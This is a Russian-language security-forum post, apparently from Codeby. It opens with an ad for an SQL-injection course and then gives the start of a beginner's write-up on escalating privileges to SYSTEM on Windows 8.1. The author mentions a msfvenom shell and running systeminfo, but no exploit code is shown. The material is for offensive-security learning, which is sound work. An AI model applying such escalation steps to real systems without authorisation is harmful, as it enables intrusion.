• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Повышаем Windows 8.1 до SYSTEM весёлым способом

Всем тевирп, я новичок, я решил для себя написать статью в которой покажу как я повысил права до system, может это извращённый метод, но просто читайте её :)

Я смотрел один урок по повышению привилегий на системе Windows и решил поиграть с этим, и увлёкся. Пишу потому что думаю, что я так лучше запомню инфу

Попытка быстро получить SYSTEM

Собственно забрался я в систему под Windows 8.1, момент как я это сделал, я пропущу потому, что я сейчас изучаю повышение привилегий, а не как скрытно хакнуть, поэтому я просто залил чистый shell, с помощью msfvenom

Когда я получил сессию моей целью было повысить привилегии до SYSTEM!
Я тыркался в этих быстрых командах с надеждой на быстрый ХАК, но нифига

1673018812934.png

И тут я пошёл в shell, что бы посмотреть там интересное

Этап 1: Поиск вкусного

1673019339838.png

systeminfo - отображает подробную информацию о конфигурации компьютера и его операционной системы, включая конфигурацию операционной системы, информацию о безопасности, идентификатор продукта и свойства оборудования (например, ОЗУ, место на диске и сетевые карты).
Systeminfo перенаправил в текстовик, после этого я загрузил на Kali этот файл, и сейчас будем смотреть в него